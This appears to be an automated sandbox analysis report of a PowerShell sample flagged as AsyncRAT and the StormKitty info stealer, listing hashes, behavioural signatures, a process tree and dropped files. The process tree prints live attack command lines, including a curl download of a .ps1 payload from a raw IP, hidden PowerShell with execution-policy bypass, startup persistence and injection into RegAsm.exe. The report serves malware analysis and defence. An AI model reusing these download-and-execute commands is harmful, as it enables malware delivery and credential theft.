Analysis
-
max time kernel
95s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-01-2025 03:00
Static task
static1
Behavioral task
behavioral1
Sample
b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps1
Resource
win7-20240729-en
General
-
Target
b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps1
-
Size
21KB
-
MD5
524fca1eea0f55f1ad6281325664dcb4
-
SHA1
fa39a3bb823909c0294804a32303378ac25e0492
-
SHA256
b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff
-
SHA512
a8002af2535c7fa629b7375943ade44f36fe0b76ccc324ab35d09e96931f7e5fc82c88787a423ae96ad58d2683f870693edb6f5cbafdd4b6576f3d1a09ff24b2
-
SSDEEP
384:zIAXUpjxl+K++gtu0P1GUK++qUpjxl6Upjxl+mATyK++IcmATpPsPWmATEP9rPva:zIAMVl+7+gbh7+3VlnVliTy7+IITJqKh
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/4324-49-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1192 powershell.exe 15 4116 powershell.exe -
pid Process 1192 powershell.exe 4116 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4116 set thread context of 4324 4116 powershell.exe 93 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1192 powershell.exe 1192 powershell.exe 1192 powershell.exe 1192 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4324 RegAsm.exe 4324 RegAsm.exe 4324 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 4324 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4324 RegAsm.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1192 wrote to memory of 3584 1192 powershell.exe 85 PID 1192 wrote to memory of 3584 1192 powershell.exe 85 PID 3584 wrote to memory of 1460 3584 cmd.exe 86 PID 3584 wrote to memory of 1460 3584 cmd.exe 86 PID 3584 wrote to memory of 4116 3584 cmd.exe 87 PID 3584 wrote to memory of 4116 3584 cmd.exe 87 PID 1460 wrote to memory of 3492 1460 cmd.exe 88 PID 1460 wrote to memory of 3492 1460 cmd.exe 88 PID 4116 wrote to memory of 3412 4116 powershell.exe 89 PID 4116 wrote to memory of 3412 4116 powershell.exe 89 PID 3412 wrote to memory of 1996 3412 csc.exe 90 PID 3412 wrote to memory of 1996 3412 csc.exe 90 PID 4116 wrote to memory of 2296 4116 powershell.exe 91 PID 4116 wrote to memory of 2296 4116 powershell.exe 91 PID 4116 wrote to memory of 2296 4116 powershell.exe 91 PID 4116 wrote to memory of 3732 4116 powershell.exe 92 PID 4116 wrote to memory of 3732 4116 powershell.exe 92 PID 4116 wrote to memory of 3732 4116 powershell.exe 92 PID 4116 wrote to memory of 4324 4116 powershell.exe 93 PID 4116 wrote to memory of 4324 4116 powershell.exe 93 PID 4116 wrote to memory of 4324 4116 powershell.exe 93 PID 4116 wrote to memory of 4324 4116 powershell.exe 93 PID 4116 wrote to memory of 4324 4116 powershell.exe 93 PID 4116 wrote to memory of 4324 4116 powershell.exe 93 PID 4116 wrote to memory of 4324 4116 powershell.exe 93 PID 4116 wrote to memory of 4324 4116 powershell.exe 93
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\curl.execurl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps14⤵PID:3492
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ml5t1vzq\ml5t1vzq.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9EC0.tmp" "c:\Users\Admin\AppData\Local\Temp\ml5t1vzq\CSCFEED695757704D1E9F1E10D403F91AE.TMP"5⤵PID:1996
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:2296
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3732
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4324
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5f3ef9fafc4750a2416005a6ba76a9df4
SHA15bc8005a8181ceb20825d6e131d51db7317c0a3c
SHA25674b1fc19798340cc84ff891ef62f74c906258861af9264adbb4cc775f85d85fc
SHA512ce24e33f506d07ff138eb3844ae959a3eefa694e1c0699a16d2b050acc3b1e2ab15f37b6da6131cda578968c87e8439082d154f21385be3e114bc1c02c8d87b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD538cf9a116e1831996b0e1d2f1d294e15
SHA191de69064fdb9b6c38c4444ba8fe6b68d0305c6c
SHA256b6a860dca0750d8ff6b6803a44f50ef3b2bc3f2298b2bf52a6240af41d617751
SHA5127753fb86a93c4c48c9e272f29b75fd4c446d4799439add6477cd9d5a5f2204f74b5d6d8922d1756626fa9f41c4651301ec5c4544673573834048454937cfeb46
-
Filesize
5KB
MD5380f7a432a6528223c05a2d48990827c
SHA1ea7d06b5acda2f1afacd348fe64454fadaa4ece4
SHA256cb6aaa288e92a75b77120f5996cddacf5374c5fcc3679f942554d52f740149c6
SHA512cf16e64182cab9f2ecf9ae4351be69d0bce0833973f2071df76e1061cda9128c54392ffde006c64d41f4c26d3086cdcc85ea0410ecb29887f72f40db33a0c803
-
Filesize
652B
MD5c90f73d273b64fa011189e87e7115e0c
SHA150145ec3ec6d67b80c4e0b03aaad0e29f16579da
SHA2563276613b4db621f8eeb95157a756a276b280e3e66e45e74f89105fe2ea28a61a
SHA512c335dfe470ee9777a71775f8cef2c77ee7104963e332dce6ca867adb2e2592167500b6fbe43815d82cd3eea6195584fcc28ccb67bc9153155ad7ab0c27560725
-
Filesize
10KB
MD54cffc8d6fe3870e0046b7be9bff146aa
SHA1aee44d9772c5392c5da7237ba0090cbadfd4eeac
SHA256e6518d89d7c8f761a277fe634fed0c41a4deee7c8d5cd4eaca503d88f247ec83
SHA51242fa00f7ce8fb9f77f1c7b3b140bb6708d01609bbc77514e86d34c1ed82b2d6a0a4f4775674043c3e4a486e4e19f3dcf3c0d33f73fcd79e75126b2f42fac136a
-
Filesize
204B
MD54307b1b3ab2b93b598893f0876a339d8
SHA13366e8852b686ba19932956f4255b963ec692ea9
SHA256c682dd964e22843c41c4c0db1370b54332ee8f4eb0ba410386cb31148ebc7ca2
SHA512de8abaa3904dcd2faf3d1e1c639aad9a4a56ccad8b8c843483c7c554907068714046f7e460861f933ff5bdce89e00a756fa250102f9024fe4de019840f29d548